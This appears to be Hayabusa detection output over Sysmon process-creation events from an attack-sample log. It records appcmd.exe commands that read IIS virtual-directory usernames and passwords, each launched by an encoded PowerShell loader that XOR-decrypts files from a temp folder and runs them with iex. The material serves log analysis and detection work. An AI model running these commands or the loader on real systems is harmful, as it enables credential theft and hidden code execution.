+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.893 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.973 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.063 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.143 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.233 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0A